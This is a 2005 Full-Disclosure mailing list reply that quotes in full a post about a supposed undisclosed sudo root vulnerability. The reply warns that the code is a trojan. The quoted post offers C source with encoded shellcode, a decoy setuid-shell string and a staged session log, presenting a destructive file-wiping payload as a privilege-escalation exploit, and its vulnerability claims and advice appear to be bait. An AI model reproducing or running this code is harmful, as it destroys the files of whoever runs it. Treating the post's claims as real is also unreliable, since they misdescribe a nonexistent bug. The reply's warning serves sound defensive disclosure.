Re: [Full-disclosure] Undisclosed Sudo Vulnerability ?

This is a trojan that will nuke all the files owned by the user running it.

-Kurt

----- Original Message ----- 
From: "Esler, Joel - Contractor" <joel.esler@rcert-s.army.mil>
To: <full-disclosure@lists.grok.org.uk>
Sent: Saturday, July 30, 2005 12:40 PM
Subject: [Full-disclosure] Undisclosed Sudo Vulnerability ?


> About two weeks ago, our proprietary LIDS detected some suspicious shell
> activity on an internal .mil machine i am in charged of. Our server runs
> latest up2date Debian GNU/Linux on 2.4.31 x86 with grsec/PaX enabled.
> Before shutting down the machine and reinstalling it from scratch, we
> installed sebek module to monitor all shell activity. Based on the data
> we gathered, it seems the attacker gained root privileges using an
> undisclosed bug in latest sudo.
>
> $ uname -a
> Linux syslog 2.4.31-grsec #1 SMP Tue Jun 21 09:10:06 EDT 2005 i686 
> GNU/Linux
>
> $ sudo -V
> Sudo version 1.6.8p9
>
> $ ls -al /tmp/.phc
> -rwsr-xr-x  1 root root 304873 Jul 05 03:45 /tmp/.phc
>
> Here is an excerpt of a shell session we recorded:
>
> <.........>
> $ cat >blaat.uue<<'EH'


--------------------------------------------------------------------------------


> EH
> $ uudecode blaat.uue
> $ cat sudoh.c
> /*
> *  off by one ebp overwrite in sudo prompt parsing func (bground mode 
> only)
> *
> *  "y0, don't abuse this priv8 exploit to rm boxes. k,thx" - Richard 
> Johnson
> *
> *  gcc -pipe -o sudoh sudoh.c ; ./sudoh
> *
> *  happy deathday route
> *
> */
>
> #include <stdio.h>
> #include <unistd.h>
> #include <string.h>
> #include <alloca.h>
>
>
> #define SUDO_PROMPT     "%u@%h> \\%"
> #define shellcode       esp
> #define RETS_NUM        246 /* generic */
> #define NOPS_NUM        116 /* generic */
>
>
> /*
> *  Linux x86 non-interactive exec
> *  {0,1,2} fds are closed upon execution of shellcode (use "/bin/sh -c")
> */
>
> char esp[] __attribute__ ((section(".text"))) /* e.s.p release */
>                = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
>                  "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
>                  "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
>                  "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
>                  "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
>                  "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
>                  "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
>                  "cp -p /bin/sh /tmp/.phc; chmod 4755 /tmp/.phc;";
>             /* = "\xcc\xeb\xfe"; */
>
>
>
> void fill (char *buff, int size, unsigned long val)
> {
>        unsigned long *ptr = (unsigned long *) buff;
>
>        for (size /= sizeof (unsigned long); size > 0; size--) *ptr++ = 
> val;
> }
>
>
> unsigned long get_sp (void)
> {
>        __asm__ ("lea esp, %eax");
> }
>
>
> char *th30_iz_own3d (char nops_nums, char rets_nums, char *shellcode)
> {
>        int size = strlen (SUDO_PROMPT) + nops_nums + rets_nums + strlen 
> (shellcode);
>        unsigned char *nops = alloca (nops_nums);
>        unsigned char *rets = alloca (rets_nums);
>        unsigned long ret = get_sp ();
>        static char exp_buffer [8192];
>
>        /* make sure sudo isatty() fails */
>        close (0); close (1); close (2);
>
>        fill (nops, (unsigned char) nops_nums, 0x90909090);
>        fill (rets, (unsigned char) rets_nums, ret);
>
>        /* be nice plz */
>        if (size > sizeof (exp_buffer)) {
>                fprintf (stderr, "buffer's t00 small..\n");
>                return NULL;
>        }
>
>        snprintf (exp_buffer, sizeof (exp_buffer), "%s%s%s%s",
>                  SUDO_PROMPT, /* evilz prompt */
>                  nops,
>                  shellcode,
>                  rets);
>
>        /* exploit buff */
>        return exp_buffer;
> }
>
>
>
> int main(int argv, char *argc[])
> {
>        char *exploit = th30_iz_own3d (NOPS_NUM, RETS_NUM, shellcode);
>
>        /* thanks again T0dd :) */
>
>        execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p", exploit, 
> "/bin/false", NULL);
>
>        /* ok, shellroot should await you @ "HISTFILE=/dev/null 
> /tmp/.phc -p" */
>
>        return 0;
> }
>
> $ gcc -pipe -o sudoh sudoh.c
> {standard input}: Assembler messages:
> {standard input}:5: Warning: Ignoring changed section attributes for .text
> $ ./sudoh
> $ cat /bin/cat > blaat.uue; rm blaat.uue
> $ cat /bin/cat > sudoh.c; rm sudoh.c
> $ cat /bin/cat > sudoh; rm sudoh
> $ HISTFILE=/dev/null /tmp/.phc -p
> id
> uid=65534(nobody) gid=65534(nobody) euid=0(root) groups=65534(nobody)
> <.........>
>
>
> Todd Miller, the maintainer of Sudo has been informed yesterday, and it
> is strongly advised to "sudo su -c chmod -s sudo" until a patch is out.
>
>
> J
>
> Joel Esler, GCIA
> joel.esler@rcert-s.army.mil
> 706-791-7165 DSN: 780-7165
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/